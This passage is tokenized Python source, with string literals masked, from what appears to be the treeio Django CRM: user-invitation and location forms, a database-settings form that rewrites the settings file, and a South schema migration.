"<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> self . invitation = invitation <EOL> def clean_username ( self ) : <EOL> "<STR_LIT>" <EOL> data = self . cleaned_data [ '<STR_LIT:username>' ] <EOL> query = Q ( name = data ) <EOL> existing = User . objects . filter ( query ) <EOL> if existing : <EOL> raise forms . ValidationError ( <EOL> _ ( "<STR_LIT>" ) % data ) <EOL> user_limit = getattr ( settings , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if user_limit > <NUM_LIT:0> : <EOL> user_number = User . objects . filter ( disabled = False ) . count ( ) <EOL> if user_number >= user_limit : <EOL> raise forms . 
ValidationError ( <EOL> _ ( "<STR_LIT>" ) % ( user_limit ) ) <EOL> return data <EOL> def clean_password_again ( self ) : <EOL> "<STR_LIT>" <EOL> password1 = self . cleaned_data [ '<STR_LIT:password>' ] <EOL> password2 = self . cleaned_data [ '<STR_LIT>' ] <EOL> if not password1 == password2 : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return password2 <EOL> def save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> profile = None <EOL> if self . invitation : <EOL> django_user = django_auth . User ( <EOL> username = self . cleaned_data [ '<STR_LIT:username>' ] , password = '<STR_LIT>' ) <EOL> django_user . set_password ( self . cleaned_data [ '<STR_LIT:password>' ] ) <EOL> django_user . save ( ) <EOL> try : <EOL> profile = django_user . profile <EOL> except : <EOL> profile = User ( ) <EOL> profile . user = django_user <EOL> profile . name = django_user . username <EOL> profile . default_group = self . invitation . default_group <EOL> profile . save ( ) <EOL> try : <EOL> contact_type = ContactType . objects . get ( <EOL> Q ( name = '<STR_LIT>' ) | Q ( slug = '<STR_LIT>' ) ) <EOL> except : <EOL> contact_type = ContactType . objects . all ( ) [ <NUM_LIT:0> ] <EOL> try : <EOL> contact = profile . get_contact ( ) <EOL> if not contact : <EOL> contact = Contact ( ) <EOL> except : <EOL> contact = Contact ( ) <EOL> contact . name = self . cleaned_data [ '<STR_LIT:name>' ] <EOL> contact . contact_type = contact_type <EOL> contact . related_user = profile <EOL> contact . save ( ) <EOL> try : <EOL> emailfield = contact_type . fields . filter ( field_type = '<STR_LIT:email>' ) [ <NUM_LIT:0> ] <EOL> email = ContactValue ( <EOL> value = self . invitation . email , field = emailfield , contact = contact ) <EOL> email . save ( ) <EOL> except : <EOL> pass <EOL> widget = Widget ( user = profile , <EOL> perspective = profile . get_perspective ( ) , <EOL> module_name = '<STR_LIT>' , <EOL> widget_name = '<STR_LIT>' ) <EOL> widget . 
save ( ) <EOL> return profile <EOL> class LocationForm ( forms . ModelForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , user , location_id , * args , ** kwargs ) : <EOL> super ( LocationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Location . objects , mode = '<STR_LIT:x>' ) <EOL> if location_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = location_id <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Location <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> class SqlSettingsForm ( forms . Form ) : <EOL> sql_engine = forms . ChoiceField ( choices = ( ( "<STR_LIT>" , _ ( '<STR_LIT>' ) , ) , ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , ( "<STR_LIT>" , _ ( '<STR_LIT>' ) ) , ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) ) ) <EOL> sql_database = forms . CharField ( max_length = <NUM_LIT> ) <EOL> sql_user = forms . CharField ( max_length = <NUM_LIT:30> ) <EOL> sql_password = forms . CharField ( <EOL> max_length = <NUM_LIT> , required = False , widget = forms . PasswordInput ) <EOL> def clean_sql_engine ( self ) : <EOL> engine = self . cleaned_data [ '<STR_LIT>' ] <EOL> return "<STR_LIT>" % engine <EOL> def create_database ( self ) : <EOL> if not self . _errors : <EOL> from django . db import connections <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from treeio . core . domains import setup_domain_database <EOL> database = { <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> } <EOL> settings . 
DATABASES [ '<STR_LIT>' ] = database <EOL> try : <EOL> setup_domain_database ( '<STR_LIT>' , True ) <EOL> except ImproperlyConfigured as exc : <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( <EOL> [ _ ( "<STR_LIT>" ) + exc . message ] ) <EOL> del self . cleaned_data [ '<STR_LIT>' ] <EOL> except Exception as exc : <EOL> del connections . _connections [ '<STR_LIT>' ] <EOL> raise ValidationError ( <EOL> _ ( "<STR_LIT>" ) + '<STR_LIT>' % exc ) <EOL> finally : <EOL> del settings . DATABASES [ '<STR_LIT>' ] <EOL> settings . DATABASES [ router . db_for_read ( ConfigSetting ) ] = database <EOL> connections . _connections . clear ( ) <EOL> if not getattr ( settings , '<STR_LIT>' , False ) : <EOL> settings_filepath = sys . modules [ <EOL> os . environ [ '<STR_LIT>' ] ] . __file__ <EOL> if settings_filepath . endswith ( '<STR_LIT>' ) : <EOL> settings_filepath = settings_filepath [ : - <NUM_LIT:1> ] <EOL> with open ( settings_filepath , '<STR_LIT:r>' ) as fl : <EOL> lines = fl . readlines ( ) <EOL> with open ( settings_filepath , '<STR_LIT:w>' ) as fl : <EOL> lines = iter ( lines ) <EOL> for line in lines : <EOL> if '<STR_LIT>' not in line : <EOL> fl . write ( line ) <EOL> else : <EOL> fl . write ( '<STR_LIT>' ) <EOL> break <EOL> fl . write ( repr ( settings . DATABASES ) ) <EOL> fl . write ( '<STR_LIT>' ) <EOL> for line in lines : <EOL> if '<STR_LIT:=>' in line : <EOL> fl . write ( line ) <EOL> break <EOL> for line in lines : <EOL> fl . write ( line ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) <EOL> ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:64> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) <EOL> ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . 
delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' 
: ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' 
: '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : 
"<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:key>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : 
"<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { 
'<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object_name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ 
] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : 
"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } 